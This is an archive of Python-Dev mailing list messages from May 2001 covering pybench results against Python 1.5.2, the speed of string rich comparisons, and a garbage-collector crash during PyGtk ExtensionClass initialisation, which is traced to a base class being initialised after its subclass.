I compared current CVS with 1.5.2, both compiled with GCC 2.95.3 and
the -O3 flag; ran pybench of an 800MHz P3 with 256MB RAM running Linux
2.2.17.

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 0.85
This machine benchmarks at 11764.7 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 0.94
This machine benchmarks at 10638.3 pystones/second

PYBENCH 0.9

Benchmark: cvs (rounds=10, warp=100)

Tests:                              per run    per oper.  diff *
------------------------------------------------------------------------
          BuiltinFunctionCalls:      41.85 ms    1.64 us  +31.40%
                 CompareFloats:      39.60 ms    0.44 us  +13.96%
         CompareFloatsIntegers:
               CompareIntegers:
                  CompareLongs:      39.85 ms    0.44 us  +15.01%
                CompareStrings:
                CompareUnicode:
                 ConcatStrings:      48.65 ms    1.62 us  +46.76%
                 ConcatUnicode:
               CreateInstances:      75.75 ms    9.02 us  +55.54%
       CreateStringsWithConcat:      51.60 ms    1.29 us  +62.78%
       CreateUnicodeWithConcat:
                  DictCreation:      87.80 ms    2.93 us  +115.72%
             DictWithFloatKeys:
           DictWithIntegerKeys:
            DictWithStringKeys:
                      ForLoops:      63.85 ms   31.93 us  -13.60%
                    IfThenElse:
                   ListSlicing:
                NestedForLoops:      32.95 ms    0.66 us  +10.39%
          NormalClassAttribute:
       NormalInstanceAttribute:
           PythonFunctionCalls:      48.85 ms    1.48 us  +11.78%
             PythonMethodCalls:      38.95 ms    2.60 us  +12.09%
                     Recursion:
                  SecondImport:      37.80 ms    7.56 us  +65.79%
           SecondPackageImport:      38.95 ms    7.79 us  +50.68%
         SecondSubmoduleImport:      49.90 ms    9.98 us  +35.05%
       SimpleComplexArithmetic:      58.95 ms    1.34 us  +74.67%
        SimpleDictManipulation:
         SimpleFloatArithmetic:
      SimpleIntFloatArithmetic:
       SimpleIntegerArithmetic:
        SimpleListManipulation:      43.65 ms    0.81 us  +15.63%
          SimpleLongArithmetic:      42.70 ms    1.29 us  +53.32%
                    SmallLists:      79.15 ms    1.55 us  +56.89%
                   SmallTuples:      66.65 ms    1.39 us  +43.03%
         SpecialClassAttribute:
      SpecialInstanceAttribute:
                StringMappings:
              StringPredicates:
                 StringSlicing:      39.00 ms    1.11 us  +28.71%
                     TryExcept:
                TryRaiseExcept:      50.60 ms   16.87 us  +27.46%
                  TupleSlicing:      37.90 ms    1.80 us  +26.54%
               UnicodeMappings:
             UnicodePredicates:
             UnicodeProperties:
                UnicodeSlicing:
------------------------------------------------------------------------
            Average round time:    3177.00 ms                n/a

*) measured against: 1.5.2 (rounds=10, warp=100)

(As MAL did, I removed all the results were the difference is +/-
10%.)

i-never-do-simple-complex-arithmetic-anyway-ly yr's,
Jeremy


From martin at loewis.home.cs.tu-berlin.de  Thu May 17 08:12:18 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 08:12:18 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
Message-ID: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>

> OK, from what I understand, that makes no sense.  Does it to you?

After reviewing everything again, I think I now do: In the richcomp
case, I have

			res = (*f1)(v, w, op);
			if (res != Py_NotImplemented)
				return res;

f1 is string_richcompare, so I get 2 function calls inside do_richcmp:
one to string_richcompare, the other one to string_compare, as my
optimizations are not triggered in your example.

If I set tp_richcompare of strings to 0, I get past this code, and do

		c = (*f)(v, w);
		if (PyErr_Occurred())
			return NULL;
		return convert_3way_to_object(op, c);

Here, I get 3 function calls: f is string_compare, then
PyErr_Occurred, finally convert_3way_to_object, which converts
{-1,0,1} x Op -> {Py_True, Py_False}.

Indeed, when I inline convert_3way_to_object, I get the same speed in
both cases (with the remaining differences attributed to measurement
and gcc doing register usage differently in both functions).

I'd still be in favour of giving strings a richcompare, since it
allows to optimize what I think is the single most frequent case:
Py_EQ on strings. With a control flow like

		if (a->ob_size != b->ob_size) 
                   goto False;

		if (a->ob_size == 0) 
                   goto True;

		if (a->ob_sval[0] != b->ob_sval[0])
                   goto False;

		if(memcmp(a->ob_sval, b->ob_sval, a->ob_size))
                   goto False;
                else
                   goto True;

we can reduce the number of function calls 

Regards,
Martin


From skip at pobox.com  Thu May 17 08:42:41 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 01:42:41 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
Message-ID: <15107.29409.242342.200378@beluga.mojam.com>

Over the past couple days I've included python-dev on various messages in an
ongoing thread about a segmentation violation I was getting with the new
PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
Schemenauer, I finally know what's going on and I have a simple workaround
that lets me get back to work.  Here's a summary of the problem.

When defining ExtensionClass types, you need to create and initialize a
PyExtensionClass struct.  It looks something like so:

    PyExtensionClass PyGtkTreeSortable_Type = {
	PyObject_HEAD_INIT(NULL)
	0,				/* ob_size */
	"GtkTreeSortable",			/* tp_name */
	sizeof(PyPureMixinObject),	/* tp_basicsize */
	...
    };

Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
normally be the address of a type object (e.g. &PyType_Type).  However, Jim
Fulton pointed out that on Windows you can't get the address of &PyType_Type
object at compile time.  Accordingly, ExtensionClass provides a
PyExtensionClass_Export macro whose responsibility is, in part, to set the
ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
will know why.  I just accept Jim's word as gospel and move on...)

A problem arises if the garbage collector runs while the module
initialization function is running, but before all the ob_type fields have
been assigned their correct values.  In this case, a one-element tuple
representing the bases of a particular PyGtk extension class was traversed
by the garbage collector.

The workaround turns out to be exceedingly simple:

    import gc
    gc.disable()
    import gtk
    gc.enable()

I can handle doing that from Python code for the time being and will leave
it up to others to decide how, if at all, ExtensionClass should be changed
to correct the problem.

Skip


From martin at loewis.home.cs.tu-berlin.de  Thu May 17 08:41:15 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 08:41:15 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
Message-ID: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>

> 1. String objects are also equal despite being different objects,
>    if their ob_sinterned pointers are equal and non-NULL.  So if
>    you're looking for every trick in & out of the book, that's
>    another one.

That does not help. In the entire test suite, there are 0 instances
where strings are compared which are not identical, but have equal
ob_sinterned pointers.

> > So 5% of the calls are with identical strings, for which I can
> > immediately decide the outcome.
>
> But also at the cost of doing a fruitless compare and branch in 95%
> of calls.

Whether there's a fruitless branch depends on your compiler. With gcc
3, you can write

	if (__builtin_expect(a == b, 0)) {

and then the body of the if block will be moved out of the way of
linear control flow.

> Any idea where those 800,000 virgin calls to oldcomp are coming
> from?  That's a lot.

As far as I could trace it, most of them come from lookdict_string (at
various locations inside this function).

> > #comps:                        2949421
> > #memcmps:                       917776
> >
> > So still, ca. 30% can be decided by first byte.
> 
> Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
> 2949421, in which case I would have expected you to say that 70% can be
> decided by first byte.

Oops, you are right.

> It's clearer that this is going to hurt sorting (& bisect etc), by
> adding yet another layer of function call to get Py_LT resolved (as
> for dict compares too, the string richcmp can't do anything to speed
> up Py_LT that string oldcmp can't do just as efficiently -- indeed,
> that's the great advantage oldcmp's "compare first character" test
> had: that *can* decide Py_LT in one byte much of the time (but
> length comparison cannot)).

So to support sorting better, I should special-case Py_LT in
string_richcompare also, to avoid the function call ?-)

> Note too earlier mail about how adding a richcmp slot to strings will
> suddenly slow cmp(string1, string2) (which is the usual way to program a
> search tree, because cmp() *used* to call a string comparison routine only
> once; but after adding a richcmp slot, each cmp(string1, string2) will call
> the richcmp slot from 1 thru 3 times (data-dependent)).

Yes, that is a serious problem. Fortunately, very few calls in my
programs go to string_compare through cmp() now. But then, your
programs are different, of course...

Regards,
Martin


From mal at lemburg.com  Thu May 17 08:54:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 08:54:37 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a 
 workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <3B0375AD.24E039B0@lemburg.com>

skip at pobox.com wrote:
> 
> Over the past couple days I've included python-dev on various messages in an
> ongoing thread about a segmentation violation I was getting with the new
> PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
> Schemenauer, I finally know what's going on and I have a simple workaround
> that lets me get back to work.  Here's a summary of the problem.
> 
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
> 
>     PyExtensionClass PyGtkTreeSortable_Type = {
>         PyObject_HEAD_INIT(NULL)
>         0,                              /* ob_size */
>         "GtkTreeSortable",                      /* tp_name */
>         sizeof(PyPureMixinObject),      /* tp_basicsize */
>         ...
>     };
> 
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time.  Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
> doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
> will know why.  I just accept Jim's word as gospel and move on...)
> 
> A problem arises if the garbage collector runs while the module
> initialization function is running, but before all the ob_type fields have
> been assigned their correct values.  In this case, a one-element tuple
> representing the bases of a particular PyGtk extension class was traversed
> by the garbage collector.

I wonder how the GC collector could "see" the type object before
it has been initialized... since PyGtkTreeSortable_Type is a static
C array and not a known PyObject until you add it to some Python
dictionary as type object or use it for creating instances, it
seems strange that the GC collector can reach out for it and
get hit by the fact that it is not yet properly initialized.

Some logic in PyExtensionClass_Export() or the GTK module must
be twisted.
 
> The workaround turns out to be exceedingly simple:
> 
>     import gc
>     gc.disable()
>     import gtk
>     gc.enable()
> 
> I can handle doing that from Python code for the time being and will leave
> it up to others to decide how, if at all, ExtensionClass should be changed
> to correct the problem.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at effbot.org  Thu May 17 09:00:20 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Thu, 17 May 2001 09:00:20 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>

Skip wrote:
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
> 
>     PyExtensionClass PyGtkTreeSortable_Type = {
>        PyObject_HEAD_INIT(NULL)
>        0, /* ob_size */
>        "GtkTreeSortable", /* tp_name */
>        sizeof(PyPureMixinObject), /* tp_basicsize */
>        ...
>     };
> 
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time. Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime

footnote: this is usually done in the module init function, *before*
the call to Py_InitModule.  see:

    http://www.python.org/doc/FAQ.html#3.24

if the garbage collector can run after Python calls a module's init-
function, but before that module calls back into Python, anything
can happen...

Cheers /F


From skip at pobox.com  Thu May 17 09:04:06 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 02:04:06 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a 
 workaround
In-Reply-To: <3B0375AD.24E039B0@lemburg.com>
References: <15107.29409.242342.200378@beluga.mojam.com>
	<3B0375AD.24E039B0@lemburg.com>
Message-ID: <15107.30694.131193.989215@beluga.mojam.com>

    mal> I wonder how the GC collector could "see" the type object before it
    mal> has been initialized... since PyGtkTreeSortable_Type is a static C
    mal> array and not a known PyObject until you add it to some Python
    mal> dictionary as type object or use it for creating instances, it
    mal> seems strange that the GC collector can reach out for it and get
    mal> hit by the fact that it is not yet properly initialized.

It is actually PyGtkWidget_Type that is not yet initialized when it is
placed in the bases tuple for one of its subclasses.  GC traverses that
tuple, then dives into each element.  It hits the PyGtkWidget_Type object,
whose ob_type field has not yet been initialized.  The actual object whose
bases tuple is being traversed is (in all the crashes I encountered),
GdkDragContext.  The ordering of the registration calls could perhaps be
reordered.  Currently GdkDragContext is patched up before GtkWidget, its
base class.  This code is generated by James Henstridge's wrapper code
generator, so perhaps he can maintain the necessary class hierarchy
relationships and insure that base classes are initialized before their
subclasses.

Skip


From skip at pobox.com  Thu May 17 09:07:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 02:07:15 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
References: <15107.29409.242342.200378@beluga.mojam.com>
	<00c101c0de9f$0a6c4d10$e46940d5@hagrid>
Message-ID: <15107.30883.680397.280556@beluga.mojam.com>

    Fredrik> footnote: this is usually done in the module init function,
    Fredrik> *before* the call to Py_InitModule.  see:

    Fredrik>     http://www.python.org/doc/FAQ.html#3.24

    Fredrik> if the garbage collector can run after Python calls a module's
    Fredrik> init- function, but before that module calls back into Python,
    Fredrik> anything can happen...

Thanks for pointing that out.  Py_InitModule is indeed called before the
fixup occurs.

Skip


From mal at lemburg.com  Thu May 17 09:09:38 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 09:09:38 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a 
 workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
		<3B0375AD.24E039B0@lemburg.com> <15107.30694.131193.989215@beluga.mojam.com>
Message-ID: <3B037932.476F475A@lemburg.com>

skip at pobox.com wrote:
> 
>     mal> I wonder how the GC collector could "see" the type object before it
>     mal> has been initialized... since PyGtkTreeSortable_Type is a static C
>     mal> array and not a known PyObject until you add it to some Python
>     mal> dictionary as type object or use it for creating instances, it
>     mal> seems strange that the GC collector can reach out for it and get
>     mal> hit by the fact that it is not yet properly initialized.
> 
> It is actually PyGtkWidget_Type that is not yet initialized when it is
> placed in the bases tuple for one of its subclasses.  GC traverses that
> tuple, then dives into each element.  It hits the PyGtkWidget_Type object,
> whose ob_type field has not yet been initialized.  The actual object whose
> bases tuple is being traversed is (in all the crashes I encountered),
> GdkDragContext.  The ordering of the registration calls could perhaps be
> reordered.  Currently GdkDragContext is patched up before GtkWidget, its
> base class.  This code is generated by James Henstridge's wrapper code
> generator, so perhaps he can maintain the necessary class hierarchy
> relationships and insure that base classes are initialized before their
> subclasses.

Wouldn't it be easier to simply set the ob_type fields right at the
start of the initGtk() function ? This is what I do for all
my extensions and I've never seen any problems with it.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From james at daa.com.au  Thu May 17 09:18:23 2001
From: james at daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 15:18:23 +0800 (WST)
Subject: [Python-Dev] Re: GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <Pine.LNX.4.33.0105171515140.409-100000@quoll.daa.com.au>

On Thu, 17 May 2001 skip at pobox.com wrote:

>
> Over the past couple days I've included python-dev on various messages in an
> ongoing thread about a segmentation violation I was getting with the new
> PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
> Schemenauer, I finally know what's going on and I have a simple workaround
> that lets me get back to work.  Here's a summary of the problem.
>
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
>
>     PyExtensionClass PyGtkTreeSortable_Type = {
> 	PyObject_HEAD_INIT(NULL)
> 	0,				/* ob_size */
> 	"GtkTreeSortable",			/* tp_name */
> 	sizeof(PyPureMixinObject),	/* tp_basicsize */
> 	...
>     };
>
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time.  Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
> doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
> will know why.  I just accept Jim's word as gospel and move on...)

Well, for Extension Classes, PyType_Type is not correct either.  And
because ExtensionClass is loaded at runtime, we can't set the ob_type
field in the initialiser even on Unix systems.

>
> A problem arises if the garbage collector runs while the module
> initialization function is running, but before all the ob_type fields have
> been assigned their correct values.  In this case, a one-element tuple
> representing the bases of a particular PyGtk extension class was traversed
> by the garbage collector.
>
> The workaround turns out to be exceedingly simple:
>
>     import gc
>     gc.disable()
>     import gtk
>     gc.enable()
>
> I can handle doing that from Python code for the time being and will leave
> it up to others to decide how, if at all, ExtensionClass should be changed
> to correct the problem.

Thanks for debugging this problem Skip.  If we don't find a correct
solution to the problem, I can put the gc disable/enable calls inside the
gtk/__init__.py module.

James.


From mal at lemburg.com  Thu May 17 09:26:32 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 09:26:32 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com>
Message-ID: <3B037D27.E258C363@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Since it is possible that these figures result from my specific
> > machine setup, I'd like to know what other people see on their
> > machines.
> 
> Is this the same machine where you were able to get 15% difference a few
> years ago by adding or removing an unreachable printf in ceval.c (or was that
> Vladimir)?  If so, I bet it's degenerated to random 50% difference since then
> <wink>.

That must have been Valdimir's machine... even though I do admit
that some small reordering changes do result in speedups of
up to 10% -- probably due to the compiler accidentally creating
code which the CPUs cache management likes.
 
> My Win98SE box is *astonishingly* useless for timings.  Without fail, the
> first time I run pystone after a reboot yields a result a solid 50% higher
> than the second or subsequent times I run it (yes, it's major-league *slower*
> the second time).  This is true across dozens of trials over several months,
> and across all versions of Python.

On Linux the situation is somewhat different; still I'm executing
the tests 10-times each and for the figures I posted, I even
ran pybench twice and only took the second readings as basis.
 
> And simple little loops routinely vary in reported runtime by a factor of 3.
> I may have to dig my old Win95 box out of the packing crate <0.6 wink>.
> 
> None of that changes, of course, that the numbers you got are scary.

Sure are... but I'm not so much interested in the absolute
numbers -- it's the hot-spots which showed up that scare me:
e.g. dictionary creation seems to have suffered along the way
for some reason, functions calls are even slower now than they
were previously and other important tasks such a instance
creation take a similar hit (probably as a result of the other
two).

Running the same test for 2.1 vs. 2.0 there's not much to
notice, so the important changes seem to be originating in
the move from 1.5.2 to 2.0.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From james at daa.com.au  Thu May 17 09:33:17 2001
From: james at daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 15:33:17 +0800 (WST)
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem
 and a workaround
In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
Message-ID: <Pine.LNX.4.33.0105171522400.409-100000@quoll.daa.com.au>

On Thu, 17 May 2001, Fredrik Lundh wrote:

> footnote: this is usually done in the module init function, *before*
> the call to Py_InitModule.  see:

The PyExtensionClass_Export() function requires a pointer to the module
dictionary so that it can add itself to the module.  Unfortunately this
requires that Py_InitModule to have been called before hand.

I guess this means that the current ExtensionClass API will need to be
modified in order to allow ExtensionClasses to be initialised before
Py_InitModule.

>
>     http://www.python.org/doc/FAQ.html#3.24
>
> if the garbage collector can run after Python calls a module's init-
> function, but before that module calls back into Python, anything
> can happen...

James.


From mwh at python.net  Thu May 17 09:43:38 2001
From: mwh at python.net (Michael Hudson)
Date: 17 May 2001 08:43:38 +0100
Subject: [Python-Dev] Performance compares
In-Reply-To: "M.-A. Lemburg"'s message of "Thu, 17 May 2001 09:26:32 +0200"
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com>
Message-ID: <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> Sure are... but I'm not so much interested in the absolute numbers
> -- it's the hot-spots which showed up that scare me: e.g. dictionary
> creation seems to have suffered along the way for some reason,
> functions calls are even slower now than they were previously and
> other important tasks such a instance creation take a similar hit
> (probably as a result of the other two).

Have you tried fiddling with gc parameters?  If the GC does a multi
generation trawl through the heap in the middle of some test, that
might skew the numbers in unexpected ways.

Or not, of course.

Cheers,
M.

-- 
  CLiki pages can be edited by anybody at any time. Imagine the most
  fearsomely comprehensive legal disclaimer you have ever seen, and
  double it                        -- http://ww.telent.net/cliki/index


From mal at lemburg.com  Thu May 17 11:03:06 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 11:03:06 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com> <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3B0393CA.7B0E024C@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com> writes:
> 
> > Sure are... but I'm not so much interested in the absolute numbers
> > -- it's the hot-spots which showed up that scare me: e.g. dictionary
> > creation seems to have suffered along the way for some reason,
> > functions calls are even slower now than they were previously and
> > other important tasks such a instance creation take a similar hit
> > (probably as a result of the other two).
> 
> Have you tried fiddling with gc parameters?  If the GC does a multi
> generation trawl through the heap in the middle of some test, that
> might skew the numbers in unexpected ways.
> 
> Or not, of course.

No, I haven't tried fiddling with those. I'm not sure I want
to either ;-) ... the reason is that applications won't switch
off GC for execution and so the tests is closer to real life.

Still, I'll rerun the test suite using gc.disable() and post the 
results.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Thu May 17 11:18:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 11:18:36 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com> <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk> <3B0393CA.7B0E024C@lemburg.com>
Message-ID: <3B03976C.CF47961@lemburg.com>

"M.-A. Lemburg" wrote:
> 
> Michael Hudson wrote:
> >
> > "M.-A. Lemburg" <mal at lemburg.com> writes:
> >
> > > Sure are... but I'm not so much interested in the absolute numbers
> > > -- it's the hot-spots which showed up that scare me: e.g. dictionary
> > > creation seems to have suffered along the way for some reason,
> > > functions calls are even slower now than they were previously and
> > > other important tasks such a instance creation take a similar hit
> > > (probably as a result of the other two).
> >
> > Have you tried fiddling with gc parameters?  If the GC does a multi
> > generation trawl through the heap in the middle of some test, that
> > might skew the numbers in unexpected ways.
> >
> > Or not, of course.
> 
> No, I haven't tried fiddling with those. I'm not sure I want
> to either ;-) ... the reason is that applications won't switch
> off GC for execution and so the tests is closer to real life.
> 
> Still, I'll rerun the test suite using gc.disable() and post the
> results.

Turns out, the difference is not noticable (< 1%).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From gmcm at hypernet.com  Thu May 17 15:00:27 2001
From: gmcm at hypernet.com (Gordon McMillan)
Date: Thu, 17 May 2001 09:00:27 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <3B03932B.8219.CCBF9F3F@localhost>

[Skip] 

> Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
> It would normally be the address of a type object (e.g.
> &PyType_Type).  However, Jim Fulton pointed out that on Windows
> you can't get the address of &PyType_Type object at compile time.

This is MS being passive-aggressive. If you tell MSVC the 
source is C++, it will magically find the address of 
PyType_Type at compile time, but their language lawyers 
apparently  believe the C spec disallows this. Standards 
conformant and incompatible -

what-MS-calls-"win-win"-ly y'rs

- Gordon


From guido at digicool.com  Thu May 17 16:04:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 09:04:59 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Thu, 17 May 2001 08:12:18 +0200."
             <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>  
            <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> 
Message-ID: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>

> I'd still be in favour of giving strings a richcompare, since it
> allows to optimize what I think is the single most frequent case:
> Py_EQ on strings.

I have always thought that eventually (but long before Py3K!) all
objects would only support rich comparisons and the __cmp__ and
tp_compare slots would become completely obsolete.  I realize I
probably haven't expressed this thought clearly, and I'm not going to
push for this to happen quickly or forecefully, but it's nevertheless
how I see things.  I expect it would allow a tremendous cleanup of the
comparison code.  It will never reach the simplicity of cmp() -- but
think of Einstein's (?) rule "things should be as simple as they can
be, but no simpler."  Clearly cmp() was too simple. :-)

Anyway, it worries me whenever I hear someone express the thought that
adding rich comparisons to a particular object type would be a bad
idea because it would slow things down.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 17 16:37:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 10:37:30 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: Your message of "Thu, 17 May 2001 09:00:27 EDT."
             <3B03932B.8219.CCBF9F3F@localhost> 
References: <3B03932B.8219.CCBF9F3F@localhost> 
Message-ID: <200105171437.f4HEbUB09503@odiug.digicool.com>

> [Skip] 
> 
> > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
> > It would normally be the address of a type object (e.g.
> > &PyType_Type).  However, Jim Fulton pointed out that on Windows
> > you can't get the address of &PyType_Type object at compile time.
> 
> This is MS being passive-aggressive. If you tell MSVC the 
> source is C++, it will magically find the address of 
> PyType_Type at compile time, but their language lawyers 
> apparently  believe the C spec disallows this. Standards 
> conformant and incompatible -
> 
> what-MS-calls-"win-win"-ly y'rs
> 
> - Gordon

I don't think MS blames it on the language spec so much; it's probably
more that they use the spec as an excuse not to fix their
implementation.  The problem only occurs when the definition of the
symbol is in a different DLL than the reference.  This is why built-in
types like PyTuple_Type don't have this problem.  I guess for C++ they
have to do a dynamic initializer anyway, so they can make this work,
but they haven't bothered to make it work for C.

My other point is that Skip's problem is clearly a gtk bug: it
shouldn't have exposed the type before fully initializing it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From james at daa.com.au  Thu May 17 16:48:43 2001
From: james at daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 22:48:43 +0800 (WST)
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem
 and a workaround
In-Reply-To: <200105171437.f4HEbUB09503@odiug.digicool.com>
Message-ID: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>

On Thu, 17 May 2001, Guido van Rossum wrote:

> My other point is that Skip's problem is clearly a gtk bug: it
> shouldn't have exposed the type before fully initializing it.

On further investigation, it turned out that it was caused by a bug in my
code generator that caused one extension class to be initialised before
its base class (in fact, that particular extension class shouldn't have
had any base classes).  It was just the cyclic GC code triggering the bug.

It will be fixed in the next snapshot of pygtk for GTK+ 2.0

James.

-- 
Email: james at daa.com.au
WWW:   http://www.daa.com.au/~james/


From guido at digicool.com  Thu May 17 16:52:54 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 10:52:54 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: Your message of "Thu, 17 May 2001 22:48:43 +0800."
             <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au> 
References: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au> 
Message-ID: <200105171452.f4HEqse09691@odiug.digicool.com>

> On further investigation, it turned out that it was caused by a bug in my
> code generator that caused one extension class to be initialised before
> its base class (in fact, that particular extension class shouldn't have
> had any base classes).  It was just the cyclic GC code triggering the bug.
> 
> It will be fixed in the next snapshot of pygtk for GTK+ 2.0

Excellent news, James!  I love the open source process!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry at digicool.com  Thu May 17 17:04:50 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 17 May 2001 11:04:50 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
References: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>
	<200105171452.f4HEqse09691@odiug.digicool.com>
Message-ID: <15107.59538.421007.37251@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> Excellent news, James!  I love the open source process!

No kidding!

http://perens.com/Articles/StandTogether.html

:)


From Barrett at stsci.edu  Thu May 17 16:56:49 2001
From: Barrett at stsci.edu (Paul Barrett)
Date: Thu, 17 May 2001 10:56:49 -0400
Subject: [Python-Dev] mmap module
Message-ID: <3B03E6B1.A19F6594@STScI.Edu>

